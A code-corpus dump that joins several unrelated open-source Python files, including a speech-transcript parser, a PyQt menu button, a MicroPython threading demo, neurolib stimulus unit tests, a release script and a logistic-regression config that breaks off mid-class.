def parse_kspon_speech(line):
sentence_id, original_sentence = line.split(' :: ')
# Cleaning - remove unknown/noise labels
sentence = re.sub(r'\s*[ublon]/\s*', r' ', original_sentence)
# Cleaning - remove meaningless character(maybe typo in original transcription)
sentence = re.sub(r'^/ ', r' ', sentence)
# Cleaning - remove repetition characters
sentence = re.sub(r'[\+\*]', r'', sentence)
pronounces = dict(re.findall(r'\(([^\)]+)\)/\(([^\)]+)\)', sentence))
pron_sentence = re.sub(r'\(([^\)]+)\)/\(([^\)]+)\)', r'\2', sentence)
sentence = re.sub(r'\(([^\)]+)\)/\(([^\)]+)\)', r'\1', sentence)
# Cleaning - remove filler characters
sentence = re.sub(r'(?<=[^\)])/\s*', r' ', sentence)
pron_sentence = re.sub(r'(?<=[^\)])/\s*', r' ', pron_sentence)
# Cleaning - remove space+
sentence = re.sub(r' +', r' ', sentence)
pron_sentence = re.sub(r' +', r' ', pron_sentence)
original_sentence = original_sentence.strip()
pron_sentence = pron_sentence.strip()
sentence = sentence.strip()
return sentence_id, sentence, pron_sentence, original_sentence, pronounces
def load_aihub_kspon_speech_scripts(paths):
examples = []
for path in paths:
with open(path, encoding='utf-8') as f:
examples += [KsponSpeech(*parse_kspon_speech(line))
for line in f.readlines()]
return examples
|
bruges/attribute/__init__.py | mycarta/bruges | 209 | 12750787 | <reponame>mycarta/bruges<filename>bruges/attribute/__init__.py
# -*- coding: utf-8 -*-
"""
:copyright: 2015 Agile Geoscience
:license: Apache 2.0
"""
from .energy import energy
from .similarity import similarity
from .dipsteer import dipsteer
from .spectrogram import spectrogram
from .spectraldecomp import spectraldecomp
|
inselect/gui/user_template_popup_button.py | NaturalHistoryMuseum/inselect | 128 | 12750788 | from PyQt5.QtWidgets import QAction, QFileDialog, QMenu, QPushButton
from inselect.lib.user_template import UserTemplate
from inselect.lib.utils import debug_print
from .user_template_choice import user_template_choice
from .utils import load_icon, reveal_path
class UserTemplatePopupButton(QPushButton):
"User template popup button"
FILE_FILTER = 'Inselect user templates (*{0})'.format(
UserTemplate.EXTENSION
)
def __init__(self, parent=None):
super(UserTemplatePopupButton, self).__init__(parent)
# Configure the UI
self._create_actions()
self.popup = QMenu()
self.inject_actions(self.popup)
self.setMenu(self.popup)
user_template_choice().template_changed.connect(self.changed)
# User template might already have been loaded so load the initial
if user_template_choice().current:
self.changed()
def __del__(self):
# Doing this prevents segfault on exit. Unsatisfactory.
del self.popup
def _create_actions(self):
self._choose_action = QAction(
"Choose...", self, triggered=self.choose,
icon=load_icon(':/icons/open.png')
)
self._refresh_action = QAction(
"Reload", self, triggered=self.refresh,
icon=load_icon(':/icons/refresh.png')
)
self._reveal_template_action = QAction(
"Reveal template", self, triggered=self.reveal
)
self._default_action = QAction(
"Default ({0})".format(user_template_choice().DEFAULT.name),
self, triggered=self.default, icon=load_icon(':/icons/close.png')
)
def inject_actions(self, menu):
"Adds user template actions to menu"
menu.addAction(self._choose_action)
menu.addAction(self._refresh_action)
menu.addAction(self._reveal_template_action)
menu.addSeparator()
menu.addAction(self._default_action)
def default(self, checked=False):
"Sets the default template"
user_template_choice().select_default()
def choose(self, checked=False):
"Shows a 'choose template' file dialog"
debug_print('UserTemplateWidget.choose')
path, selectedFilter = QFileDialog.getOpenFileName(
self, "Choose user template",
str(user_template_choice().last_directory()),
self.FILE_FILTER
)
if path:
# Save the user's choice
user_template_choice().load(path)
def refresh(self, checked=False):
debug_print('UserTemplateWidget.refresh')
user_template_choice().refresh()
def reveal(self, checked=False):
reveal_path(user_template_choice().current_path)
def changed(self):
"Slot for UserTemplateChoice.template_changed"
debug_print('UserTemplateWidget.changed')
choice = user_template_choice()
self.setText(choice.current.name)
self._default_action.setEnabled(not choice.current_is_default)
self._refresh_action.setEnabled(not choice.current_is_default)
self._reveal_template_action.setEnabled(not choice.current_is_default)
|
MicroPython_BUILD/components/internalfs_image/image/examples/thread_example.py | FlorianPoot/MicroPython_ESP32_psRAM_LoBo | 838 | 12750792 | <gh_stars>100-1000
import machine, _thread, time
import micropython, gc
import bme280
# Setup the LED pins
bled = machine.Pin(4, mode=machine.Pin.OUT)
#rled = machine.Pin(0, mode=machine.Pin.OUT)
#gled = machine.Pin(2, mode=machine.Pin.OUT)
bled.value(0)
#gled.value(0)
#rled.value(0)
# Setup I2C to be used with BME280 sensor
i2c=machine.I2C(scl=machine.Pin(26),sda=machine.Pin(25),speed=400000)
# Initialize BME280
bme=bme280.BME280(i2c=i2c)
# Define LED thread function
#---------------------------
def rgbled(n=200, led=bled):
notif_exit = 4718
notif_replay = 2
notif_count = 3
x = 0
_thread.allowsuspend(True)
while True:
led.value(1)
time.sleep_ms(n)
led.value(0)
x = x + 1
t = 10
while t > 0:
notif = _thread.getnotification()
if notif == notif_exit:
_thread.sendmsg(_thread.getReplID(), "[%s] Exiting" % (_thread.getSelfName()))
return
elif notif == notif_replay:
_thread.sendmsg(_thread.getReplID(), "[%s] I've been notified" % (_thread.getSelfName()))
elif notif == notif_count:
_thread.sendmsg(_thread.getReplID(), "[%s] Run counter = %u" % (_thread.getSelfName(), x))
elif notif == 777:
_thread.sendmsg(_thread.getReplID(), "[%s] Forced EXCEPTION" % (_thread.getSelfName()))
time.sleep_ms(1000)
zz = 234 / 0
elif notif != 0:
_thread.sendmsg(_thread.getReplID(), "[%s] Got unknown notification: %u" % (_thread.getSelfName(), notif))
typ, sender, msg = _thread.getmsg()
if msg:
_thread.sendmsg(_thread.getReplID(), "[%s] Message from '%s'\n'%s'" % (_thread.getSelfName(), _thread.getThreadName(sender), msg))
time.sleep_ms(100)
t = t - 1
gc.collect()
# For LED thread we don't need more than 3K stack
_ = _thread.stack_size(3*1024)
# Start LED thread
#rth=_thread.start_new_thread("R_Led", rgbled, (100, rled))
time.sleep_ms(500)
#gth=_thread.start_new_thread("G_Led", rgbled, (250, gled))
bth=_thread.start_new_thread("B_Led", rgbled, (100, bled))
# Function to generate BME280 values string
#---------------
def bmevalues():
t, p, h = bme.read_compensated_data()
p = p // 256
pi = p // 100
pd = p - pi * 100
hi = h // 1024
hd = h * 100 // 1024 - hi * 100
#return "[{}] T={0:1g}C ".format(time.strftime("%H:%M:%S",time.localtime()), round(t / 100,1)) + "P={}.{:02d}hPa ".format(pi, pd) + "H={}.{:01d}%".format(hi, hd)
return "[{}] T={}C ".format(time.strftime("%H:%M:%S",time.localtime()), t / 100) + "P={}.{:02d}hPa ".format(pi, pd) + "H={}.{:02d}%".format(hi, hd)
# Define BME280 thread function
#-----------------------
def bmerun(interval=60):
_thread.allowsuspend(True)
sendmsg = True
send_time = time.time() + interval
while True:
while time.time() < send_time:
notif = _thread.getnotification()
if notif == 10002:
_thread.sendmsg(_thread.getReplID(), bmevalues())
elif notif == 10004:
sendmsg = False
elif notif == 10006:
sendmsg = True
elif (notif <= 3600) and (notif >= 10):
interval = notif
send_time = time.time() + interval
_thread.sendmsg(_thread.getReplID(), "Interval set to {} seconds".format(interval))
time.sleep_ms(100)
send_time = send_time + interval
if sendmsg:
_thread.sendmsg(_thread.getReplID(), bmevalues())
# 3K is enough for BME280 thread
_ = _thread.stack_size(3*1024)
# start the BME280 thread
bmeth=_thread.start_new_thread("BME280", bmerun, (60,))
# === In the 3rd thread we will run Neopixels rainbow demo ===
np=machine.Neopixel(machine.Pin(22), 24)
# DEfine Neopixels thread function
#---------------
def thrainbow():
pos = 0
bri = 0.02
while True:
for i in range(0, 24):
dHue = 360.0/24*(pos+i);
hue = dHue % 360;
np.setHSB(i, hue, 1.0, bri, 1, False)
np.show()
notif = _thread.getnotification()
if (notif > 0) and (notif <= 100):
bri = notif / 100.0
elif notif == 1000:
_thread.sendmsg(_thread.getReplID(), "[%s] Run counter = %u" % (_thread.getSelfName(), pos))
pos = pos + 1
# Start the Neopixels thread
npth=_thread.start_new_thread("Neopixel", thrainbow, ())
utime.sleep(1)
machine.heap_info()
_thread.list()
# Set neopixel brightnes (%)
#_thread.notify(npth, 20)
# Get counter value from Neopixel thread
#_thread.notify(npth, 1000)
|
tests/test_metaheader.py | 1Q1-Open-Source/django-data-wizard | 279 | 12750812 | from .base import BaseImportTestCase
class MetaHeaderTestCase(BaseImportTestCase):
serializer_name = "tests.naturalkey_app.wizard.NoteMetaSerializer"
def test_manual(self):
run = self.upload_file("naturalkey_meta.xlsx")
# Inspect unmatched columns and select choices
self.check_columns(run, 4, 4)
self.update_columns(
run,
{
"Note": {
"Date:": "event[date]",
"Place:": "event[place][name]",
"Note": "note",
"Status": "status",
}
},
)
# Start data import process, wait for completion
self.start_import(run, [])
# Verify results
self.assert_log(
run,
[
"created",
"parse_columns",
"update_columns",
"do_import",
"import_complete",
],
)
self.assert_records(
run,
[
"Imported 'Minneapolis on 2019-01-01: Test Note 1' at row 4",
"Imported 'Minneapolis on 2019-01-01: Test Note 2' at row 5",
"Imported 'Minneapolis on 2019-01-01: Test Note 3' at row 6",
],
)
|
adanet/core/timer.py | eustomaqua/adanet | 3,323 | 12750814 | """A simple timer implementation.
Copyright 2018 The AdaNet Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
class _CountDownTimer(object):
"""A simple count down timer implementation."""
def __init__(self, duration_secs):
"""Initializes a `_CountDownTimer`.
Args:
duration_secs: Float seconds for countdown.
Returns:
A `_CountDownTimer` instance.
"""
self._start_time_secs = time.time()
self._duration_secs = duration_secs
def secs_remaining(self):
"""Returns the remaining countdown seconds."""
diff = self._duration_secs - (time.time() - self._start_time_secs)
return max(0., diff)
|
tests/test_stimulus.py | Ronjaa95/neurolib | 258 | 12750820 | """
Tests of noise input.
"""
import unittest
import numpy as np
from chspy import CubicHermiteSpline
from neurolib.models.aln import ALNModel
from neurolib.utils.stimulus import (
ConcatenatedStimulus,
ExponentialInput,
LinearRampInput,
OrnsteinUhlenbeckProcess,
RectifiedInput,
SinusoidalInput,
SquareInput,
StepInput,
SummedStimulus,
WienerProcess,
ZeroInput,
)
TESTING_TIME = 5.3
DURATION = 10
DT = 0.1
STIM_START = 2
STIM_END = 8
SHAPE = (2, int(DURATION / DT))
class TestCubicSplines(unittest.TestCase):
RESULT_SPLINES = np.array([-0.214062, -0.215043])
RESULT_ARRAY = np.array([0.193429, 0.073445])
def test_splines(self):
dW = WienerProcess(n=2, seed=42).as_cubic_splines(duration=DURATION, dt=DT)
self.assertTrue(isinstance(dW, CubicHermiteSpline))
np.testing.assert_allclose(self.RESULT_SPLINES, dW.get_state(TESTING_TIME), atol=1e-05)
def test_arrays(self):
dW = WienerProcess(n=2, seed=42).as_array(duration=DURATION, dt=DT)
self.assertTrue(isinstance(dW, np.ndarray))
time_idx = np.around(TESTING_TIME / DT).astype(int)
np.testing.assert_allclose(self.RESULT_ARRAY, dW[:, time_idx], atol=1e-05)
def test_shift_start_time(self):
SHIFT = 5.0
dW = WienerProcess(n=2, seed=42).as_cubic_splines(duration=DURATION, dt=DT, shift_start_time=SHIFT)
self.assertTrue(isinstance(dW, CubicHermiteSpline))
self.assertEqual(dW[0].time, SHIFT + DT)
np.testing.assert_allclose(self.RESULT_SPLINES, dW.get_state(TESTING_TIME + SHIFT), atol=1e-05)
class TestToModel(unittest.TestCase):
def test_single_node(self):
model = ALNModel()
model.params["duration"] = 2 * 1000
stim = SinusoidalInput(amplitude=1.0, frequency=1.0)
model_stim = stim.to_model(model)
model.params["ext_exc_current"] = model_stim
model.run()
self.assertTrue(isinstance(model_stim, np.ndarray))
self.assertTupleEqual(model_stim.shape, (1, int(model.params["duration"] / model.params["dt"])))
def test_multi_node_multi_stim(self):
model = ALNModel(Cmat=np.random.rand(5, 5), Dmat=np.zeros((5, 5)))
model.params["duration"] = 2 * 1000
stim = SinusoidalInput(amplitude=1.0, frequency=1.0)
model_stim = stim.to_model(model)
model.params["ext_exc_current"] = model_stim
model.run()
self.assertTrue(isinstance(model_stim, np.ndarray))
self.assertTupleEqual(model_stim.shape, (5, int(model.params["duration"] / model.params["dt"])))
class TestZeroInput(unittest.TestCase):
def test_generate_input(self):
nn = ZeroInput(n=2, seed=42).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(nn, np.ndarray))
self.assertTupleEqual(nn.shape, SHAPE)
np.testing.assert_allclose(nn, np.zeros(SHAPE))
def test_get_params(self):
nn = ZeroInput(n=2, seed=42)
params = nn.get_params()
params.pop("type")
self.assertDictEqual(params, {"n": 2, "seed": 42})
def test_set_params(self):
nn = ZeroInput(n=2, seed=42)
UPDATE = {"seed": 635}
nn.update_params(UPDATE)
params = nn.get_params()
params.pop("type")
self.assertDictEqual(params, {"n": 2, "seed": 42, **UPDATE})
class TestWienerProcess(unittest.TestCase):
def test_generate_input(self):
dW = WienerProcess(n=2, seed=42).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(dW, np.ndarray))
self.assertTupleEqual(dW.shape, SHAPE)
def test_get_params(self):
dW = WienerProcess(n=2, seed=42)
params = dW.get_params()
params.pop("type")
self.assertDictEqual(params, {"n": 2, "seed": 42})
def test_set_params(self):
dW = WienerProcess(n=2, seed=42)
UPDATE = {"seed": 6152, "n": 5}
dW.update_params(UPDATE)
params = dW.get_params()
params.pop("type")
self.assertDictEqual(params, {"n": 2, "seed": 42, **UPDATE})
class TestOrnsteinUhlenbeckProcess(unittest.TestCase):
def test_generate_input(self):
ou = OrnsteinUhlenbeckProcess(
mu=3.0,
sigma=0.1,
tau=2 * DT,
n=2,
seed=42,
).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ou, np.ndarray))
self.assertTupleEqual(ou.shape, SHAPE)
def test_get_params(self):
ou = OrnsteinUhlenbeckProcess(
mu=3.0,
sigma=0.1,
tau=2 * DT,
n=2,
seed=42,
)
params = ou.get_params()
params.pop("type")
self.assertDictEqual(params, {"n": 2, "seed": 42, "mu": 3.0, "sigma": 0.1, "tau": 2 * DT})
def test_set_params(self):
ou = OrnsteinUhlenbeckProcess(
mu=3.0,
sigma=0.1,
tau=2 * DT,
n=2,
seed=42,
)
UPDATE = {"mu": 2.3, "seed": 12}
ou.update_params(UPDATE)
params = ou.get_params()
params.pop("type")
self.assertDictEqual(params, {"n": 2, "seed": 42, "mu": 3.0, "sigma": 0.1, "tau": 2 * DT, **UPDATE})
class TestStepInput(unittest.TestCase):
STEP_SIZE = 2.3
def test_generate_input(self):
step = StepInput(
step_size=self.STEP_SIZE,
n=2,
seed=42,
).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(step, np.ndarray))
self.assertTupleEqual(step.shape, SHAPE)
np.testing.assert_allclose(step, self.STEP_SIZE)
def test_start_end_input(self):
step = StepInput(
start=STIM_START,
end=STIM_END,
step_size=self.STEP_SIZE,
n=2,
seed=42,
).as_array(duration=DURATION, dt=DT)
np.testing.assert_allclose(step[:, : int(STIM_START / DT)], 0.0)
np.testing.assert_allclose(step[:, int(STIM_END / DT) :], 0.0)
class TestSinusoidalInput(unittest.TestCase):
AMPLITUDE = 2.3
FREQUENCY = 1000.0
def test_generate_input(self):
sin = SinusoidalInput(
amplitude=self.AMPLITUDE, frequency=self.FREQUENCY, n=2, seed=42, dc_bias=True
).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(sin, np.ndarray))
self.assertTupleEqual(sin.shape, SHAPE)
np.testing.assert_almost_equal(np.mean(sin, axis=1), np.array(2 * [self.AMPLITUDE]))
def test_start_end_input(self):
sin = SinusoidalInput(
start=STIM_START,
end=STIM_END,
amplitude=self.AMPLITUDE,
frequency=self.FREQUENCY,
n=2,
seed=42,
).as_array(duration=DURATION, dt=DT)
np.testing.assert_allclose(sin[:, : int(STIM_START / DT)], 0.0)
np.testing.assert_allclose(sin[:, int(STIM_END / DT) :], 0.0)
def test_get_params(self):
sin = SinusoidalInput(
start=STIM_START,
end=STIM_END,
amplitude=self.AMPLITUDE,
frequency=self.FREQUENCY,
n=2,
seed=42,
)
params = sin.get_params()
params.pop("type")
self.assertDictEqual(
params,
{
"n": 2,
"seed": 42,
"frequency": self.FREQUENCY,
"amplitude": self.AMPLITUDE,
"start": STIM_START,
"dc_bias": False,
"end": STIM_END,
},
)
def test_set_params(self):
sin = SinusoidalInput(
start=STIM_START,
end=STIM_END,
amplitude=self.AMPLITUDE,
frequency=self.FREQUENCY,
n=2,
seed=42,
)
UPDATE = {"amplitude": 43.0, "seed": 12, "start": "None"}
sin.update_params(UPDATE)
params = sin.get_params()
params.pop("type")
self.assertDictEqual(
params,
{
"n": 2,
"seed": 42,
"frequency": self.FREQUENCY,
"amplitude": self.AMPLITUDE,
"dc_bias": False,
"end": STIM_END,
**UPDATE,
"start": None,
},
)
class TestSquareInput(unittest.TestCase):
AMPLITUDE = 2.3
FREQUENCY = 20.0
def test_generate_input(self):
sq = SquareInput(
amplitude=self.AMPLITUDE,
frequency=self.FREQUENCY,
n=2,
seed=42,
).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(sq, np.ndarray))
self.assertTupleEqual(sq.shape, SHAPE)
np.testing.assert_almost_equal(np.mean(sq, axis=1), np.array(2 * [self.AMPLITUDE]))
def test_start_end_input(self):
sq = SquareInput(
start=STIM_START,
end=STIM_END,
amplitude=self.AMPLITUDE,
frequency=self.FREQUENCY,
n=2,
seed=42,
).as_array(duration=DURATION, dt=DT)
np.testing.assert_allclose(sq[:, : int(STIM_START / DT)], 0.0)
np.testing.assert_allclose(sq[:, int(STIM_END / DT) :], 0.0)
def test_get_params(self):
sq = SquareInput(
start=STIM_START,
end=STIM_END,
amplitude=self.AMPLITUDE,
frequency=self.FREQUENCY,
n=2,
seed=42,
)
params = sq.get_params()
params.pop("type")
self.assertDictEqual(
params,
{
"n": 2,
"seed": 42,
"frequency": self.FREQUENCY,
"amplitude": self.AMPLITUDE,
"start": STIM_START,
"end": STIM_END,
"dc_bias": False,
},
)
def test_set_params(self):
sq = SquareInput(
start=STIM_START,
end=STIM_END,
amplitude=self.AMPLITUDE,
frequency=self.FREQUENCY,
n=2,
seed=42,
)
UPDATE = {"amplitude": 43.0, "seed": 12, "start": "None"}
sq.update_params(UPDATE)
params = sq.get_params()
params.pop("type")
self.assertDictEqual(
params,
{
"n": 2,
"seed": 42,
"frequency": self.FREQUENCY,
"amplitude": self.AMPLITUDE,
"end": STIM_END,
"dc_bias": False,
**UPDATE,
"start": None,
},
)
class TestLinearRampInput(unittest.TestCase):
INP_MAX = 5.0
RAMP_LENGTH = 2.0
def test_generate_input(self):
ramp = LinearRampInput(
inp_max=self.INP_MAX,
ramp_length=self.RAMP_LENGTH,
n=2,
seed=42,
).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ramp, np.ndarray))
self.assertTupleEqual(ramp.shape, SHAPE)
np.testing.assert_equal(np.max(ramp, axis=1), np.array(2 * [self.INP_MAX]))
np.testing.assert_equal(np.min(ramp, axis=1), np.array(2 * [0.25]))
def test_start_end_input(self):
ramp = LinearRampInput(
start=STIM_START,
end=STIM_END,
inp_max=self.INP_MAX,
ramp_length=self.RAMP_LENGTH,
n=2,
seed=42,
).as_array(duration=DURATION, dt=DT)
np.testing.assert_allclose(ramp[:, : int(STIM_START / DT)], 0.0)
np.testing.assert_allclose(ramp[:, int(STIM_END / DT) :], 0.0)
def test_get_params(self):
ramp = LinearRampInput(
start=STIM_START,
end=STIM_END,
inp_max=self.INP_MAX,
ramp_length=self.RAMP_LENGTH,
n=2,
seed=42,
)
params = ramp.get_params()
params.pop("type")
self.assertDictEqual(
params,
{
"n": 2,
"seed": 42,
"inp_max": self.INP_MAX,
"ramp_length": self.RAMP_LENGTH,
"start": STIM_START,
"end": STIM_END,
},
)
def test_set_params(self):
ramp = LinearRampInput(
start=STIM_START,
end=STIM_END,
inp_max=self.INP_MAX,
ramp_length=self.RAMP_LENGTH,
n=2,
seed=42,
)
UPDATE = {"inp_max": 41.0, "seed": 12}
ramp.update_params(UPDATE)
params = ramp.get_params()
params.pop("type")
self.assertDictEqual(
params,
{
"n": 2,
"seed": 42,
"inp_max": self.INP_MAX,
"ramp_length": self.RAMP_LENGTH,
"start": STIM_START,
"end": STIM_END,
**UPDATE,
},
)
class TestExponentialInput(unittest.TestCase):
INP_MAX = 5.0
EXP_COEF = 30.0
EXP_TYPE = "rise"
def test_generate_input_rise(self):
exp_rise = ExponentialInput(
inp_max=self.INP_MAX,
exp_type="rise",
n=2,
seed=42,
).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(exp_rise, np.ndarray))
self.assertTupleEqual(exp_rise.shape, SHAPE)
np.testing.assert_almost_equal(np.max(exp_rise, axis=1), np.array(2 * [self.INP_MAX]))
self.assertTrue(np.all(np.diff(exp_rise) >= 0))
def test_generate_input_decay(self):
exp_decay = ExponentialInput(
inp_max=self.INP_MAX,
exp_type="decay",
n=2,
seed=42,
).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(exp_decay, np.ndarray))
self.assertTupleEqual(exp_decay.shape, SHAPE)
self.assertTrue(np.all(np.diff(exp_decay) <= 0))
def test_start_end_input(self):
exp_rise = ExponentialInput(
start=STIM_START,
end=STIM_END,
inp_max=self.INP_MAX,
n=2,
seed=42,
).as_array(duration=DURATION, dt=DT)
np.testing.assert_allclose(exp_rise[:, : int(STIM_START / DT)], 0.0)
np.testing.assert_allclose(exp_rise[:, int(STIM_END / DT) :], 0.0)
def test_get_params(self):
exp_rise = ExponentialInput(
start=STIM_START,
end=STIM_END,
inp_max=self.INP_MAX,
n=2,
seed=42,
)
params = exp_rise.get_params()
params.pop("type")
self.assertDictEqual(
params,
{
"n": 2,
"seed": 42,
"inp_max": self.INP_MAX,
"exp_coef": self.EXP_COEF,
"exp_type": self.EXP_TYPE,
"start": STIM_START,
"end": STIM_END,
},
)
def test_set_params(self):
exp_rise = ExponentialInput(
start=STIM_START,
end=STIM_END,
inp_max=self.INP_MAX,
n=2,
seed=42,
)
UPDATE = {"inp_max": 41.0, "seed": 12}
exp_rise.update_params(UPDATE)
params = exp_rise.get_params()
params.pop("type")
self.assertDictEqual(
params,
{
"n": 2,
"seed": 42,
"inp_max": self.INP_MAX,
"exp_coef": self.EXP_COEF,
"exp_type": self.EXP_TYPE,
"start": STIM_START,
"end": STIM_END,
**UPDATE,
},
)
class TestSummedStimulus(unittest.TestCase):
def _create_input(self):
ou = OrnsteinUhlenbeckProcess(mu=0.1, sigma=0.02, tau=2.0, n=2)
sq = SquareInput(amplitude=0.2, frequency=50, n=2, start=5)
sin = SinusoidalInput(amplitude=0.1, frequency=100, n=2, start=2)
step = StepInput(step_size=0.5, n=2, start=7)
return sq + (sin + step + ou)
def test_init(self):
summed = self._create_input()
self.assertEqual(len(summed), 4)
self.assertTrue(isinstance(summed, SummedStimulus))
self.assertEqual(summed.n, 2)
self.assertEqual(len(summed.inputs), 4)
def test_set_n(self):
summed = self._create_input()
self.assertEqual(summed.n, 2)
ts = summed.as_array(duration=DURATION, dt=DT)
self.assertEqual(ts.shape[0], 2)
summed.n = 5
self.assertEqual(summed.n, 5)
ts = summed.as_array(duration=DURATION, dt=DT)
self.assertEqual(ts.shape[0], 5)
def test_generate_input(self):
summed = self._create_input()
ts = summed.as_array(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ts, np.ndarray))
self.assertTupleEqual(ts.shape, SHAPE)
ts = summed.as_cubic_splines(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ts, CubicHermiteSpline))
def test_get_params(self):
summed = self._create_input()
params = summed.get_params()
self.assertTrue(isinstance(params, dict))
self.assertEqual(len(params), 1 + len(summed.inputs))
for i, process in enumerate(summed):
self.assertDictEqual(process.get_params(), params[f"input_{i}"])
def test_update_params(self):
summed = self._create_input()
UPDATE_DICT = {f"input_{i}": {"n": 3} for i in range(len(summed))}
summed.update_params(UPDATE_DICT)
self.assertEqual(summed.n, 3)
class TestConcatenatedStimulus(unittest.TestCase):
def _create_input(self):
ou = OrnsteinUhlenbeckProcess(mu=0.1, sigma=0.02, tau=2.0, n=2)
sq = SquareInput(amplitude=0.2, frequency=20.0, n=2)
sin = SinusoidalInput(amplitude=0.1, frequency=10.0, n=2)
step = StepInput(step_size=0.5, n=2)
return ou & (sq & sin & step)
def test_init(self):
conc = self._create_input()
self.assertEqual(len(conc), 4)
self.assertTrue(isinstance(conc, ConcatenatedStimulus))
self.assertEqual(conc.n, 2)
self.assertEqual(len(conc.inputs), 4)
def test_set_n(self):
conc = self._create_input()
self.assertEqual(conc.n, 2)
ts = conc.as_array(duration=DURATION, dt=DT)
self.assertEqual(ts.shape[0], 2)
conc.n = 5
self.assertEqual(conc.n, 5)
ts = conc.as_array(duration=DURATION, dt=DT)
self.assertEqual(ts.shape[0], 5)
def test_generate_input(self):
conc = self._create_input()
ts = conc.as_array(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ts, np.ndarray))
self.assertTupleEqual(ts.shape, SHAPE)
ts = conc.as_cubic_splines(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ts, CubicHermiteSpline))
def test_get_params(self):
conc = self._create_input()
params = conc.get_params()
self.assertTrue(isinstance(params, dict))
self.assertEqual(len(params), 1 + len(conc.inputs))
for i, process in enumerate(conc):
self.assertDictEqual(process.get_params(), params[f"input_{i}"])
def test_update_params(self):
conc = self._create_input()
UPDATE_DICT = {f"input_{i}": {"n": 3} for i in range(len(conc))}
conc.update_params(UPDATE_DICT)
self.assertEqual(conc.n, 3)
class TestBeastInput(unittest.TestCase):
def _create_input(self):
ou = OrnsteinUhlenbeckProcess(mu=0.1, sigma=0.02, tau=2.0, n=2)
sq = SquareInput(amplitude=0.2, frequency=20.0, n=2)
sin = SinusoidalInput(amplitude=0.1, frequency=10.0, n=2)
step = StepInput(step_size=0.5, n=2)
return (sq + sin) & (step + ou)
def test_init(self):
beast = self._create_input()
self.assertEqual(len(beast), 2)
self.assertTrue(isinstance(beast, ConcatenatedStimulus))
for process in beast:
self.assertTrue(isinstance(process, SummedStimulus))
self.assertEqual(beast.n, 2)
def test_set_n(self):
beast = self._create_input()
self.assertEqual(beast.n, 2)
ts = beast.as_array(duration=DURATION, dt=DT)
self.assertEqual(ts.shape[0], 2)
beast.n = 5
self.assertEqual(beast.n, 5)
ts = beast.as_array(duration=DURATION, dt=DT)
self.assertEqual(ts.shape[0], 5)
def test_generate_input(self):
beast = self._create_input()
ts = beast.as_array(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ts, np.ndarray))
self.assertTupleEqual(ts.shape, SHAPE)
ts = beast.as_cubic_splines(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ts, CubicHermiteSpline))
def test_get_params(self):
beast = self._create_input()
params = beast.get_params()
self.assertTrue(isinstance(params, dict))
self.assertEqual(len(params), 1 + len(beast.inputs))
for i, process in enumerate(beast):
self.assertDictEqual(process.get_params(), params[f"input_{i}"])
class TestRectifiedInput(unittest.TestCase):
def test_init(self):
rect = RectifiedInput(0.2, n=2)
self.assertTrue(isinstance(rect, ConcatenatedStimulus))
self.assertEqual(len(rect), 5)
self.assertEqual(rect.n, 2)
def test_generate(self):
rect = RectifiedInput(0.2, n=2)
ts = rect.as_array(DURATION, DT)
self.assertTrue(isinstance(ts, np.ndarray))
self.assertTupleEqual(ts.shape, SHAPE)
ts = rect.as_cubic_splines(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ts, CubicHermiteSpline))
if __name__ == "__main__":
unittest.main()
|
make/release.py | frznvm0/Kanmail | 1,118 | 12750825 | from os import path
import click
from .settings import NEW_BUILDS_DIRNAME
from .util import print_and_run, read_version_data
def _wait_for_build(filename):
click.echo('Build the client in another window, and return here afterwards')
version = read_version_data()['version']
filename = path.join(NEW_BUILDS_DIRNAME, filename.format(version=version))
while True:
if click.confirm('Has the build completed? '):
if path.exists(filename):
return
click.echo(f'File {filename} not found, please try again.')
@click.command()
def do_release():
print_and_run(('python', '-m', 'make.clean'))
print_and_run(('python', '-m', 'make', '--release'))
if click.confirm('Build Docker container?', default=True):
print_and_run(('python', '-m', 'make', '--docker', '--release'))
if click.confirm('Build MacOS client? ', default=True):
_wait_for_build('Kanmail-mac-{version}.tar.gz')
if click.confirm('Build Windows client? ', default=True):
_wait_for_build('Kanmail-win-{version}.zip')
if click.confirm('Build Linux client? ', default=False):
_wait_for_build('Kanmail-nix64-{version}.tar.gz')
print_and_run(('python', '-m', 'make', '--release', '--complete'))
if __name__ == '__main__':
do_release()
|
textclf/config/ml_model.py | lswjkllc/textclf | 146 | 12750832 | <reponame>lswjkllc/textclf
"""各种模型的设置"""
from typing import Union, Optional, Dict
from .base import ConfigBase
class MLModelConfig(ConfigBase):
pass
class LogisticRegressionConfig(MLModelConfig):
"""参考:https://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html"""
# penalty{‘l1’, ‘l2’, ‘elasticnet’, ‘none’} Used to specify the norm used in the penalization.
penalty: str = "l2"
# Dual or primal formulation. Dual formulation is only implemented
# for l2 penalty with liblinear solver. Prefer dual=False when n_samples > n_features.
dual: bool = False
# Tolerance for stopping criteria.
tol: float = 1e-4
# Inverse of regularization strength
# must be a positive float. Like in support vector machines, smaller values specify stronger regularization.
C: float = 1.0
# Specifies if a constant(a.k.a. bias or intercept) should be added to the decision function.
fit_intercept: bool = True
# Useful only when the solver ‘liblinear’ is used and self.fit_intercept is set to True.
intercept_scaling: float = 1
# dict or ‘balanced’ or None, default="balanced"
# Weights associated with classes in the form {class_label: weight}.
